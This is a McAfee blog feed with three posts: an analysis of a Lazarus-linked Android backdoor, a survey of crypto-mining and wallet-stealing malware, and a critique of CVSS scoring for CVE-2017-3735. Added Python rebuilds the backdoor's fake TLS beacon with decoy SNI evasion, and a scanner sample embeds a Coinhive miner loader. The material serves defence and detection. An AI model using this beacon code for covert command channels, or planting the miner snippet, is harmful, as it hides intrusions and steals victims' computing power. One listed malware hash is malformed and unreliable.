Channel: McAfee Labs | McAfee Blogs

Android Malware Appears Linked to Lazarus Cybercrime Group


The McAfee Mobile Research team recently examined a new threat, Android malware that contains a backdoor file in the executable and linkable format (ELF). The ELF file is similar to several executables that have been reported to belong to the Lazarus cybercrime group. (For more on Lazarus, read this post from our Advanced Threat Research Team.)

The malware poses as a legitimate APK, available from Google Play, for reading the Bible in Korean. The legitimate app has been installed more than 1,300 times. The malicious, repackaged APK has never appeared on Google Play, and we do not know how it is distributed in the wild.

Figure 1: Description of the legitimate app on Google Play.

Figure 2: An overview of the malware’s operation.

 

Comparing Certificates

The repackaged APK has been signed by a different certificate from the legitimate APK. We can see the differences in the following two screen captures:

Figure 3: The certificate of the malicious, repackaged APK.

Figure 4: The certificate of the legitimate APK.

Once the malicious APK is installed and running, it attempts to execute the backdoor ELF that it carries at “assets/while.” If the ELF executes successfully, the device becomes a bot.

Figure 5. The main function for executing the backdoor ELF.

 

Analyzing the Backdoor

Once the backdoor ELF starts, it turns itself into what this analysis calls a zombie process to protect itself: it detaches from its parent and keeps running even if the parent process terminates (strictly speaking, a zombie is a terminated process whose exit status has not yet been reaped; here the process survives as an orphan), provided the execute() call made from the APK’s dex code succeeded.

Figure 6. The malware turns itself into a zombie process.

The malware contains a list of IP addresses of control servers. The list is encoded and written to the file /data/system/dnscd.db.

The table accompanying this analysis lists information for each of the IP addresses (they are also given in the Indicators of Compromise section below); none of them was reachable at the time of analysis.

Figure 7. The flow of writing the encoded control server IPs to a file.

The IP address array is encoded by a simple routine when it is loaded into memory from the read-only data section; that encoded data is written to the file /data/system/dnscd.db. The decoded file is then loaded into memory to select an IP address to connect to.

One of the control servers is selected at random immediately before the backdoor attempts to connect. The attempt is repeated until a connection to one of the control servers succeeds.

Figure 8. The malware creates a socket and connects to a randomly selected control server.

Once connected to a control server, the malware fills a buffer with a callback beacon. Figure 9 shows part of the message-generating code. Several fields of the message are hardcoded, in particular the bytes at offsets 0, 4, and 5. The meaning of those bytes became clear once we realized that the message only imitates the SSL/TLS handshake protocol: the byte at offset 0 is the handshake type (0x01 for ClientHello) and offsets 4 and 5 carry the protocol version of the handshake layer, so the beacon looks like the start of an ordinary TLS session.

Figure 9. A part of the function for generating a callback beacon.

Figure 10. Transferring data to be used as the callback beacon to the control server.

After the message is generated, the malware sends the packet in Figure 11 to the control server as a callback beacon. The server name indication (SNI) extension in the packet carries a well-known domain picked at random from a list embedded in the binary. We suspect this is an evasion technique to avoid detection by security solutions that look for suspicious destinations in TLS handshakes.

Figure 11. A captured packet from the callback beacon.

Figure 12. The list of legitimate (well-known) domains in the binary.

After sending the callback beacon, the malware assigns global variables that contain device information which is transferred to the control server once it receives the command code 0x5249. Figure 13 shows the jump table for implementing commands and its pseudo code.

Figure 13. The jump table for implementing commands from the control server and the structure for receiving data.

The functions are described in the following table. Command code and arguments arrive as structured data from the control server, as shown in Figure 13. The command code and arguments are assigned, respectively, to the CMD and DATA member variables of the received data structure.

After performing commands received from the control server, the malware returns the results to the control server using the codes in Figures 14 and 15. Before transferring the results, the return code and data are stored in a structure described in the following pseudo code.

Figures 14 and 15. The codes and data structure returned to the control server.

 

Similarities to Lazarus Malware

In Figure 16, the function on the left is from the backdoor ELF we have analyzed. On the right, we see procedures found in several executables used by the Lazarus Group in various attacks.

Figure 16. Similar functions to the executable used in the Sony Pictures attack.

Both functions look very similar, and the hexadecimal seeds for generating the encryption and decryption key are the same. Both functions generate the key used to encrypt and decrypt messages between the victim and the control server. Figure 17 shows functions from both the backdoor ELF and an executable recently used by the Lazarus Group: each connects to the control server, generates a disguised SSL ClientHello packet, and sends it to the control server as a callback beacon.

Figure 17. The functions to establish a connection to the control server (ELF on the left).

The function in Figure 18 generates a disguised ClientHello packet to use as a callback beacon.

Figure 18. Generating the disguised ClientHello packet (ELF on the left).

Both backdoors use the same protocol, as we confirmed by analyzing the function that receives a message from the control server. Figure 19 shows the protocol for transferring a message between the backdoor and the control server.

Figure 19. The receive message function included in the checking protocol (ELF on the left).

To transfer a message, the sender first emits a five-byte header to the destination. The header carries the size of the packet that follows, a hardcoded two-byte value, and the type of message, presumably in the order of a genuine TLS record header (type, version, length). The hardcoded value is 0x0301, the version bytes of TLS 1.0, and the message type lies between 0x14 and 0x17, the range of legitimate TLS record content types (change_cipher_spec, alert, handshake, application_data). The receiver also uses the message type to validate the incoming packet. The following is pseudo code from the receive function:

Figure 20. The five-byte packet sent before the source sends its primary message.

Figure 21. Pseudo code from the receive message function.
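To make the disguised protocol concrete, here is an added Python example (my own code, not McAfee’s and not the malware’s) that builds a beacon of the shape described above, a five-byte record header with a type in 0x14–0x17 and the hardcoded 0x0301 followed by a handshake-layer ClientHello with a decoy SNI, and implements the receive-side header check from Figure 21 plus an SNI extractor a defender could run over a capture. The decoy domain list, the cipher suite, and the exact ClientHello layout are assumptions; nothing in the analysis fixes those values. The code only builds and parses bytes, it does not open any socket.

```python
import os
import random
import struct

# TLS record content types; the backdoor's receive routine accepts only 0x14-0x17.
RECORD_TYPES = {0x14: "change_cipher_spec", 0x15: "alert",
                0x16: "handshake", 0x17: "application_data"}
HARDCODED_VERSION = 0x0301      # the fixed value noted in the analysis (TLS 1.0 on the wire)

# Constructed stand-in for the list of well-known domains in Figure 12 (assumption).
DECOY_DOMAINS = ["www.google.com", "www.amazon.com", "www.apple.com"]


def build_record_header(content_type, length):
    """Five-byte header: type (1), version (2, fixed 0x0301), payload length (2)."""
    if content_type not in RECORD_TYPES:
        raise ValueError("content type must be 0x14..0x17")
    return struct.pack("!BHH", content_type, HARDCODED_VERSION, length)


def parse_record_header(data):
    """Receive-side check: (type, length) if the header is acceptable, else None."""
    if len(data) < 5:
        return None
    content_type, version, length = struct.unpack("!BHH", data[:5])
    if content_type not in RECORD_TYPES or version != HARDCODED_VERSION:
        return None
    return content_type, length


def build_fake_client_hello(sni, client_random=None):
    """Handshake-layer ClientHello that exists only to look like TLS.
    Offset 0 is the handshake type (0x01) and offsets 4-5 the client version,
    the hardcoded positions noted in the analysis. The cipher suite is an assumption."""
    client_random = client_random or os.urandom(32)
    host = sni.encode()
    sni_entry = struct.pack("!BH", 0, len(host)) + host        # name_type 0 = host_name
    sni_ext = (struct.pack("!HH", 0x0000, len(sni_entry) + 2)  # ext type 0 = server_name
               + struct.pack("!H", len(sni_entry)) + sni_entry)
    body = (struct.pack("!H", 0x0303)              # client_version TLS 1.2
            + client_random
            + b"\x00"                              # empty session id
            + struct.pack("!H", 2) + b"\xc0\x2f"   # one cipher suite
            + b"\x01\x00"                          # compression: null only
            + struct.pack("!H", len(sni_ext)) + sni_ext)
    return b"\x01" + struct.pack("!I", len(body))[1:] + body   # type + 3-byte length


def build_beacon(domains=DECOY_DOMAINS, rng=random):
    """Record header plus disguised ClientHello carrying a random decoy SNI."""
    sni = rng.choice(domains)
    hello = build_fake_client_hello(sni)
    return build_record_header(0x16, len(hello)) + hello, sni


def extract_sni(record):
    """Recover the SNI host from a captured beacon of the layout above, or None."""
    parsed = parse_record_header(record)
    if parsed is None or parsed[0] != 0x16:
        return None
    hs = record[5:5 + parsed[1]]
    if len(hs) < 4 or hs[0] != 0x01:
        return None
    pos = 4 + 2 + 32                                     # type/len, version, random
    pos += 1 + hs[pos]                                   # session id
    pos += 2 + struct.unpack("!H", hs[pos:pos + 2])[0]   # cipher suites
    pos += 1 + hs[pos]                                   # compression methods
    end = pos + 2 + struct.unpack("!H", hs[pos:pos + 2])[0]
    pos += 2
    while pos + 4 <= end:
        ext_type, ext_len = struct.unpack("!HH", hs[pos:pos + 4])
        pos += 4
        if ext_type == 0x0000:
            name_len = struct.unpack("!H", hs[pos + 3:pos + 5])[0]
            return hs[pos + 5:pos + 5 + name_len].decode()
        pos += ext_len
    return None
```

Because the SNI is drawn at random from legitimate domains, a detection keyed on the server name alone will not work; what stays constant across beacons is the shape of the handshake (fixed version bytes, cipher-suite list, extension order), which is what a ClientHello fingerprint should be built on, together with the destination IPs listed below.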

 

Conclusion

The security industry keeps an eye on the Lazarus Group, and McAfee Mobile Security researchers actively monitor for mobile threats by Lazarus and other actors. We compared our findings with the threat intelligence research of our Advanced Threat Research team, which studies several groups and their techniques. Due to the reuse of recent campaign infrastructure, code similarities, and functions such as the fake transport layer security, these tactics match many we have observed from the Lazarus Group.

We do not know whether this is Lazarus’ first activity on a mobile platform. But based on the code similarities we can say with high confidence that the Lazarus Group is now operating in the mobile world.

 

McAfee Mobile Security detects this malware as “Android/Backdoor.” Always keep your mobile security application updated to the latest version. And never install applications from unverified sources. This habit will reduce the risk of infection by malware.

 

Indicators of Compromise:

Hashes

12cc14bbc421275c3c6145bfa186dff

24f61120946ddac5e1d15cd64c48b7e6

8b98bdf2c6a299e1fed217889af54845

9ce9a0b3876aacbf0e8023c97fd0a21d

 

Domains

mail[.]wavenet.com.ar

vmware-probe[.]zol.co.zw

wtps[.]org

 

IP addresses

110[.]45.145.103

114[.]215.130.173

119[.]29.11.203

124[.]248.228.30

139[.]196.55.146

14[.]139.200.107

175[.]100.189.174

181[.]119.19.100

197[.]211.212.31

199[.]180.148.134

217[.]117.4.110

61[.]106.2.96

The post Android Malware Appears Linked to Lazarus Cybercrime Group appeared first on McAfee Blogs.


Lazarus Cybercrime Group Moves to Mobile Platform


When it comes to describing cyberattacks, the word sophisticated is used a lot. Whether to explain yet another “advanced” campaign by a threat actor group hoping to steal information or disrupt computer systems, it seems the precursor to any analysis is to call it sophisticated. Yet the modus operandi for many of these groups is to begin an attack with a simple email, which for some time has been one of the most effective malware delivery mechanisms.

The McAfee Mobile Research team has identified a new threat—Android malware that poses as a legitimate app available from Google Play and targets South Korean users—that suggests a deviation from the traditional playbook. An analysis of campaign code, infrastructure, and tactics and procedures suggests the Lazarus group is responsible, as they evolve their attack tactics to now operate within the mobile platform. And although the debate regarding attribution of attacks will always rage, documenting evolving tactics by threat actor groups allows organizations and consumers to adapt their defenses accordingly.

Based on what we know, the app first appeared in the wild in March 2017. Distribution is very low and is aimed at a Korean audience (based on telemetry hits).

Although we cannot be certain, persons associated with GodPeople, an organization based in Seoul with a history of supporting religious groups in North Korea and the developers of the original application, could be the intended targets. GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea.

Evolving Attack Tactics

Using email as the entry vector allows attackers to be very specific about whom they target, a practice usually described as spear phishing. Developing a malicious application does not provide the same granularity. In this instance, however, the attackers built malware that poses as a legitimate APK, advertising itself as a means of reading the Bible in Korean. Using the mobile platform as the attack vector is potentially significant, particularly as South Korea has a large mobile population that is “in a race to be first with 5G,” according to a Forbes article. When a mobile platform is mentioned we typically think of phones, but South Korea also has increasing use of tablets in place of traditional laptops. How well secured are those tablets, and how are they monitored?

Evolving attacks onto the mobile platform are likely to continue, and this appears to be the first example of the Lazarus group using mobile. Such a change, therefore, is significant, demonstrating that criminals are keeping up with platform popularity. Indeed, according to the International Telecommunication Union, the global number of mobile subscriptions worldwide now exceeds the global population, which suggests that such a tactic is only likely to increase as our dependency on mobile platforms grows.

Source: International Telecommunication Union.

Keeping Safe

Understanding the evolving tactics by nefarious actors is imperative. It is critical that we adopt simple security measures to counter these new tactics. This malware is detected as “Android/Backdoor” by McAfee Mobile Security. Always keep your mobile security application updated to the latest version. And never install applications from unverified sources.


Malware Mines, Steals Cryptocurrencies From Victims


How’s your Bitcoin balance? Interested in earning more? The value of cryptocurrency is going up. One way to increase your holdings is by “mining,” which is legal as long as it is done with the proper permissions: using your own mining equipment, or establishing a formal agreement for outsourcing it. Hardware vendors such as Asus manufacture motherboards specifically tailored for mining cryptocurrency.

Bitcoin mining involves repeatedly hashing candidate block headers until one meets the network’s difficulty target (proof of work). The miner that finds a valid hash adds the next block of transactions to the Bitcoin public ledger, the “blockchain,” and is rewarded with new coins. The ledger records all transactions and lets anyone verify that they are legitimate.

Cybercriminals are also attracted to online currency, which fuels much of their business, including malware purchases and ransomware payments. Cybercriminals would rather find outside computing power instead of using their own equipment because the price of a dedicated mining machine could exceed US$5,000. Cybercriminals often seek to bypass the agreement phase and maliciously introduce malware that will either use a victim’s computing power to mine for coins or simply locate and steal the user’s cryptocurrency.

Three popular Bitcoin miners.

 

The number of instances of mining malware has increased significantly, to 1.65 million victims this year, according to one report. That’s a lot of slowing machines and increased electricity costs. For individual users, the slowness and increased electricity bill may be trivial, and go unnoticed for a time. For businesses with hundreds or thousands of machines, however, the cost increase can be substantial.

The increased interest in illegally mining or stealing cryptocurrencies tracks the rising value of these currencies. One Bitcoin (BTC) was recently worth more than $7,500, up from around $3,000 only weeks earlier. Even allowing for an earlier decline, Bitcoin has trended upward for years. This rise in value, together with Japan’s recognition of Bitcoin as a legal means of payment and its growing adoption in South Korea, has increased demand for Bitcoin and altcoins. In September it was reported that cybercriminals had mined about $63,000 worth of cryptocurrency in roughly three months by exploiting a flaw in Microsoft Internet Information Services (IIS) on unpatched Windows servers.

The price of Bitcoin since 2010. Source: CoinDesk.

Initial coin offerings (ICOs) have also contributed to this gold rush. ICOs are similar to IPOs but instead of issuing to investors shares of a new company, the investors are given cryptocurrency in the hopes a new company will be successful and result in a higher value for their digital coins.

During the last few years we have seen malware authors innovate to move into this space, producing malware that mines or steals coins across a range of platforms. Let’s break down some of the tools and techniques in the world of crypto-mining and crypto-stealing malware:

  • NightMiner
  • Adylkuzz
  • EternalMiner
  • MulDrop.14
  • ELF Linux/Mirai
  • OSX/Miner-D
  • Dridex
  • Trickbot
  • Jimmy Nukebot
  • HawkEye
  • Cerber
  • Web Mining

NightMiner

NightMiner was first seen in the wild in March 2015 and mines the Monero cryptocurrency. Some cybercriminals have turned to Monero because of its built-in privacy features and because, unlike Bitcoin, it can still be mined on general-purpose hardware. Monero is built on the CryptoNote protocol and by default uses techniques such as stealth addresses and ring signatures to obscure transactions on its blockchain. This malware has been found on network attached storage (NAS) devices and takes advantage of those devices’ CPU and GPU resources. The mining software can stay under the radar on these devices because most administrators do not install antimalware software on NAS systems. Sophos released an extensive report on this malware.

Adylkuzz

Adylkuzz is more recent, appearing this year. Like the well-known WannaCry ransomware, it spreads using two leaked tools that target Microsoft’s Server Message Block (SMB) implementation: the EternalBlue exploit for the SMBv1 flaw patched in MS17-010, and the DoublePulsar kernel backdoor that EternalBlue installs. Both were leaked by the Shadow Brokers group and are believed to be the work of the Equation Group, associated with the U.S. National Security Agency. Adylkuzz is unusual in that, once it has infected a host, it blocks all access to TCP port 445, preventing other malware from exploiting the same SMB flaw.

Code snippet from the EternalBlue Metasploit module.

EternalMiner

Linux systems are not immune. EternalMiner took advantage of a vulnerability in Samba to infect as many systems as possible. The flaw allowed Samba servers to load and execute code remotely after a shared library was uploaded by a malicious client. A patch to address the seven-year-old flaw was released in May, but cybercriminals made thousands of dollars before network administrators could update their servers.

Linux.MulDrop.14

Researchers have seen instances of Raspberry Pi—a small, versatile single-board computer— attacked by the crypto mining malware Linux.MulDrop.14. The malicious software does not attempt to mine the CPU-intensive Bitcoin but, like NightMiner, focuses on Monero. This action shows a level of innovation as cybercriminals expand their scope to acquire cryptocurrencies across additional platforms.

ELF Linux/Mirai

Cryptocurrency malware mining has been discovered in connection with the Mirai botnet. ELF Linux/Mirai continues to evolve and has added a Bitcoin miner slave module, allowing the malware to mine cryptocurrency from thousands of infected IoT devices, according to a report from IBM X-Force. Mirai, discovered in August 2016, infected IoT devices and has also been responsible for several DDoS attacks, including against DNS provider Dyn and Liberia’s Internet infrastructure.

 

Source: McAfee Labs Threats Report, March 2017

OSX/Miner-D

Although Apple’s macOS has not been heavily targeted, it is not immune. OSX/Miner-D both steals Bitcoins and mines on the infected system. This malware has been around since 2011 and is the second most common malware on the Mac. The malware, which is inserted into legitimate apps uploaded to torrent sites, surged early this year and accounted for more than 20% of all Mac detections in May. We expect to see new variants soon.

Dridex

Cryptocurrency mining has caught the attention of the Dridex Trojan’s developers. Dridex is a banking Trojan that steals credentials to access accounts. Samples of this malware were discovered in 2016 that find and steal cryptocurrency wallets.

Dridex is sophisticated malware. The developers behind this malware continue to evolve its code to avoid detection, increase infections, distribute ransomware, steal banking and personal information, and now pilfer Bitcoins.

Trickbot

The cybercriminals behind Trickbot have added the capability to steal cryptocurrency. Trickbot has been around for years and recently added coinbase.com to its list of targets. Once a system is infected, the malware monitors the victim’s browsing and injects a fake login page whenever the user visits coinbase.com. The fake page lets the criminals capture the login credentials and steal cryptocurrencies including Bitcoin, Ethereum, and Litecoin, as well as other digital assets.

Jimmy Nukebot

Another Trojan making headlines is Jimmy Nukebot. The authors behind the malicious software used code from the NeutrinoPOS banker Trojan. This variant, detected by McAfee as RDN/PWS-Banker, does not steal bank card data as before but installs various modules that contain a payload. One payload mines Monero. The digital wallet associated with the miner has received only about $45, which may indicate the malware authors either changed wallets or have stopped mining, according to Kaspersky.

McAfee Labs detections for some variants of mining malware. Peak detections are the highest number of detection occurrences on a single date in 2017.

HawkEye

The credential harvesting malware HawkEye, which surfaced in 2014, has added Bitcoin wallet stealing to its arsenal. The malware is well known for stealing a variety of credentials from web browsers and mail clients. Recent samples show HawkEye targeting the file wallet.dat, which holds the user’s Bitcoin private keys along with other transaction information.

Cerber

Developers behind most ransomware prefer the ransoms be paid using cryptocurrency. In the recent case of Cerber, however, the actors have resorted to stealing the coins from the wallet before encrypting the system. Cerber is one of the most prolific ransomware families, infecting millions of computers worldwide. The ransomware has seen a decline in the past few months but continues to wreak havoc.

The number of Cerber samples detected during the last 90 days. Source: Ransomware Tracker.

Web Mining

One new trend is mining cryptocurrency in the browsers of visitors to a website. Coinhive and Crypto-Loot, among others, sell Monero mining software that the buyer inserts into a website as JavaScript; the script mines using the site visitor’s CPU. The service has been a hot topic since it first appeared because the software can just as easily be used to mine without users’ consent. A few legitimate sites, including The Pirate Bay and a major television company, have recently been found running the software to mine Monero. The entertainment conglomerate has removed the code, but it remains unclear whether hackers injected it or the company included it to make a few extra dollars while unsuspecting users watched their favorite shows.

The Pirate Bay has also removed the mining code and released a statement claiming the 24-hour test was designed to see whether the popular file-sharing site could use the miner to generate revenue and potentially replace ads. A few other sites, including Iridium and PublicHD, use the JavaScript code openly: both inform their users of the code, and Iridium allows them to opt out. Undisclosed use of web miners has caused some websites to go dark: Cloudflare began suspending domains after discovering Coinhive’s software mining Monero from visitors to the torrent site ProxyBunker. The domains, which were suspended for not letting users opt out, were restored after the mining code was removed.

JavaScript code from Iridium’s Google Chrome miner extension.
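As an added illustration (my own code, not from the original post or from any of the services named), the following Python scanner looks for the static indicators a defender would check a page for: a script loaded from one of the two services named above, or an inline call to Coinhive’s mining API. The library URL and the CoinHive.Anonymous constructor follow Coinhive’s public documentation as I recall it and should be treated as assumptions; the sample pages are constructed, and the site key is a placeholder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts of the two commercial browser-mining services named above.
MINER_HOSTS = {"coinhive.com", "crypto-loot.com"}
# Coinhive's documented JavaScript entry points (assumption: recalled from its public docs).
API_PATTERNS = [re.compile(r"\bCoinHive\.(Anonymous|User)\s*\(")]


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def _host_of(src):
    # Protocol-relative URLs ("//coinhive.com/...") are common in embed snippets.
    return (urlparse(src if "://" in src else "https:" + src).hostname or "").lower()


def find_web_miners(html):
    """Return (kind, detail) findings for miner indicators found in the page."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = _host_of(src)
        if host in MINER_HOSTS or any(host.endswith("." + h) for h in MINER_HOSTS):
            findings.append(("external_script", src))
    for code in parser.inline:
        for pattern in API_PATTERNS:
            if pattern.search(code):
                findings.append(("miner_api_call", pattern.pattern))
    return findings


# Constructed sample pages (not captured from any real site).
MINING_PAGE = """<html><head>
<script src="//coinhive.com/lib/coinhive.min.js"></script>
<script src="/static/app.js"></script>
</head><body>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""
CLEAN_PAGE = "<html><head><script src='/static/app.js'></script></head><body><p>hi</p></body></html>"

if __name__ == "__main__":
    for name, page in (("mining", MINING_PAGE), ("clean", CLEAN_PAGE)):
        print(name, find_web_miners(page))
```

Static matching catches only miners embedded under their own names; a self-hosted or obfuscated copy needs runtime checks instead (sustained CPU use from a tab, WebAssembly worker threads, long-lived WebSocket connections to a mining proxy). On the server side, a Content-Security-Policy that restricts script-src to the site’s own origins stops a third-party miner script from loading at all, which is the control that would have prevented the injected cases described above regardless of who inserted the code.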

Crypto mining is not new, but it has gained attention due to the popularity of cryptocurrency, ICOs, and the overall value increase of alt coins. As the adoption rate for cryptocurrency grows, we can expect cybercriminals to increasingly illegally mine or steal cryptocurrency. They can exploit online funds to shop on the dark web or in exchange for real currency.

A timeline of leading cryptocurrency miners.


Don’t Substitute CVSS for Risk: Scoring System Inflates Importance of CVE-2017-3735


I am a wry observer of vulnerability announcements. CVE-2017-3735, a one-byte buffer overread in OpenSSL’s handling of an X.509 certificate extension, presents an excellent example of the limitations of the Common Vulnerability Scoring System (CVSS). CVSS is the de facto security industry standard for calculating and exchanging information about the severity of vulnerabilities. The problem is that it is used for far more than it was intended.

For many organizations, security tools, and risk assessments, a CVSS score has become the security industry’s shorthand substitute for risk scoring and impact rating. In fact, many organizations measure their ongoing risk posture by counting the number of unfixed vulnerabilities and their associated CVSS scores.

The McAfee Product Security Incident Response Team (PSIRT) uses CVSS Version 3.0 as an important tool to assess vulnerabilities. McAfee PSIRT augments CVSS with other risk analysis techniques, similar to Microsoft PSIRT’s Exploitability Index and Security Update Severity Rating System.

CVSS is useful, but must not be confused with deeper risk assessment. Strictly relying on CVSS for vulnerabilities such as OpenSSL’s CVE-2017-3735 is likely to cause incident responders to focus their organizations’ resources on patch cycles that may be unnecessary. In addition, PSIRT credibility and influence may be squandered on low-impact, low-probability issues. Due to the sheer volume of issues being discovered and reported, PSIRT must remain focused on those that have a high probability of exploitation and whose organizational impact or attacker value make them worthy of exploitation.

But as we shall see from the following analysis, a vulnerability taken out of context cannot be equated with risk. Furthermore, CVSS has an inherent problem in that the impact and exploitability sub-scores are simply added together to produce the base score: from the attacker’s perspective this is a mistake, because threat actors exploit vulnerabilities to suit their goals, not merely because something is easy.

For those readers whose sole interest is assessing OpenSSL CVE-2017-3735, I believe this issue should be rated as a low to very low risk. Although easy to trigger, exploitation offers an attacker little of value; the most likely impact is cosmetic, within a text display. Moreover, the code in which CVE-2017-3735 occurs is not called from OpenSSL’s protocol and cryptographic functions,[1] but is confined to the textual display of an X.509 certificate, typically for a user’s consumption. (Certificate display is not part of typical cryptographic operations.)

Taking either of the competing published CVSS scores for this vulnerability, 5.3 or 7.5, at face value is misleading. Without further analysis one might be tempted to rate the risk from CVE-2017-3735 above its rather minor impact. That is why I decided to investigate further, including reading the offending module’s code on GitHub. CVE-2017-3735 is a case in which an accurately calculated CVSS score does not match the likelihood of exploitation and lands above what a risk analysis would probably reach.

Although it is true that attackers must choose exploits that lie within their technological capabilities—namely, exploits that are easy enough to ensure success—the first concern will nearly always be, “What will the exercise of this vulnerability achieve for me?”

In other words, what matters is the impact or result from the exploitation that is key to choosing a particular attack, not its relative ease or difficulty. If a vulnerability advances the attacker’s goals, then it will be considered for use. If there is nothing to gain, the vulnerability will not be exploited.

Limits to CVSS

Attackers exploit vulnerabilities that further their goals: That is a key point when assessing the potential for harm of any vulnerability. In this analysis, we will take a closer look at CVE-2017-3735 for its potential value to attackers. Along the way, we will also examine some of the limitations of CVSS as it applies to this vulnerability.

I do not mean to assert that CVSS is not an important tool for assessing vulnerabilities. I have worked with CVSS since before Version 1 was published; CVSS is key to prioritizing initial responses to vulnerabilities as they are released. CVSS may comprise one component of a robust risk rating method or approach.

I like to characterize CVSS as “potential severity.” A CVSS score, when fairly calculated,[2] can indicate what any vulnerability might harm. CVSS scores are particularly useful for triage, before a deeper analysis.

The McAfee PSIRT uses CVSS as a core component of incident response, as many organizations’ PSIRTs do. As a CVE Numbering Authority, McAfee PSIRT must calculate a CVSS score for every published vulnerability. In practice, nearly every potential issue is scored, and that score is the foundation of PSIRT’s fuller risk assessment.

Still, despite the importance of CVSS to vulnerability triage, it is a mistake to confuse a CVSS score with a risk rating, as we shall see.

CVE-2017-3735 has had two competing CVSS scores published.[3] The difference lies in the rating of the Integrity impact, High or Low, which yields a base score of either 7.5 or 5.3 (in CVSS Version 3.0). In both cases the exploitability metrics are identical and at their maximum: the issue can be triggered over the network, with low complexity and without privileges or user interaction, giving an exploitability sub-score of 3.9 (the CVSS Version 2 exploitability sub-score for the same combination is 10).

CVSS = 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

(From: https://nvd.nist.gov/vuln/detail/CVE-2017-3735)

CVSS = 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

(From: https://nvd.nist.gov/vuln/detail/CVE-2017-3735)

How can there be two CVSS calculations? Why is one calculation High and one Low? Plus, is Integrity the correct impact parameter?

We can answer these questions by analyzing what the vulnerability allows.

The vulnerability is a buffer overread. An attacker may read one more byte from program memory than should be allowed. The attacker’s advantage of the unallowed access is directly related to where that extra byte exists. After looking at the code on GitHub, it appears all buffers in that module are allocated from program heap memory. Although running programs can exhibit macro patterns in their heap allocations and deallocations, generally, we can assume that any allocation may reside wherever it is convenient for the program memory manager to grab a piece of memory sufficiently large to support the request. This introduces an element of entropy (randomness) into any particular allocation. Each allocation may come from any portion of heap memory; there is no guarantee of a particular address.

Because a particular address cannot be guaranteed, an overread will get whatever bytes happen to be larger than that allocation’s required size.

Whichever data happen to be at that address is what the overread vulnerability will retrieve. Buffer overread exploitation can be a fishing expedition; there are no guarantees of the data retrieved, though there may be macro patterns in programs in which runtime processing is relatively consistent from run to run. The data returned depends on how lucky the attacker is. We saw the same situation in the Heartbleed overread vulnerability.

Just One Byte

For CVE-2017-3735, the overread is precisely a single byte. That is a very small payoff for the attacker, especially considering that there is no guarantee of what that byte might contain.

Furthermore, even if this were not an overread but rather an overflow (which it is not), a single byte is not enough space for malicious code to allow an attacker to exit to a command shell. A buffer overread does not allow an attacker to push code into a program heap. It allows an attacker only to retrieve data (a single byte) that the attacker should not have reached.

Although we may be surprised some day by a clever attacker’s ingenious use of a single byte, today we see no way that anyone can benefit.

If CVE-2017-3735 allows an attacker to retrieve only a single byte, why have CVSS scorers used the Integrity impact rather than Confidentiality? Heartbleed, a heap buffer overread that returned up to 64KB per request to the attacker, impacted Confidentiality: attackers retrieved data they should not have been able to access. Yet CVE-2017-3735 has been scored on Integrity. There is a clue alongside the description.

Because I do not have access to the graph of calls to the vulnerable IPAddressFamily routines, I cannot confirm the following educated guess. Typical cryptographic and protocol implementations do not dump certificates to text; primarily users do. That suggests an attacker does not retrieve the extra byte. Instead, the extra byte is converted to text in the human-readable dump of the IPAddressFamily certificate extension, so it is the integrity of the text representation of an X.509 certificate that is affected. With this understanding of the impact, scorers chose Integrity rather than Confidentiality.

If the attacker retrieves the text dump, is there a way to track back from various text irregularities to the value of the extra byte? I have not looked at a range of dumps to confirm or deny. Perhaps this is either not possible or not a productive approach.

If there is any way to retrieve the data byte, then the proper CVSS score would have to be Confidentiality = Low rather than None, which would increase the CVSS score to either 6.5 or 8.2, depending upon Integrity’s value, Low or High.

A CVSS score of even 5.3 gives a luster of importance to CVE-2017-3735 that it does not deserve. Any of the potentially higher scores suggest the wrong direction, which is probably why scorers refrained from including the potential for a confidentiality impact. Still, we should analyze this score to understand the strengths and limitations of CVSS. If scored for all impacts and the ease of exploitation at 6.5, CVSS indicates that this is an important vulnerability that should be addressed in a timely manner. Yet if my analysis is correct, CVE-2017-3735 should not move to the top or even middle of anyone’s work queue. Patch it in due time, through scheduled update cycles. Nothing more.

The potential impact from CVE-2017-3735 is probably not significant in the vast majority of OpenSSL’s use cases. Integrity = Low, maybe Confidentiality = Low, too. Attacker utility = None.

In fact, the most often published description for CVE-2017-3735 indicates the trivial nature of any impact: “The most likely result would be an erroneous display of the certificate in text format.” (See References.[4])

After reading this analysis, I hope it is clear that CVSS fails to account for the complete situation with respect to CVE-2017-3735.

Unequal Weights

As we mentioned, the exploitability and impact scores are each weighted equally (actually, averaged). From the attacker’s view, this is inaccurate.

Attackers do not equally exploit every vulnerability. More important, attackers do not choose to exploit a vulnerability simply because it is easy to exploit. They have no time for that; attackers are trying to achieve their goals, whatever those may be. Anyone prioritizing vulnerability responses needs to keep this in mind as we analyze.

The following published description for CVE-2017-3735 is, at the very least, misleading and erroneous, considering the single-byte heap buffer overread affects only a user-initiated text dump:

“Successfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.”

There are no “security restrictions” involved in a certificate transformed to text. Further, a single byte is insufficient to enable “launching further attacks” even if the issue were more than an overread: The attacker cannot gain control of program memory through this flaw.

Quite often, organizations have hundreds or thousands of vulnerabilities to examine. To which should they respond first? Which response should get the most resources? Which of the perhaps dozens of vulnerabilities announced in any week or month can be allowed to remain open in the face of limited resources?

These are fundamental questions that every organization must answer, probably every day. One way to prioritize is to begin by assessing the potential impact to the organization and the potential utility to the attacker. These two dimensions are more important than how easy or difficult a vulnerability is to exploit, although that is also important information once we determine that a vulnerability is significant.

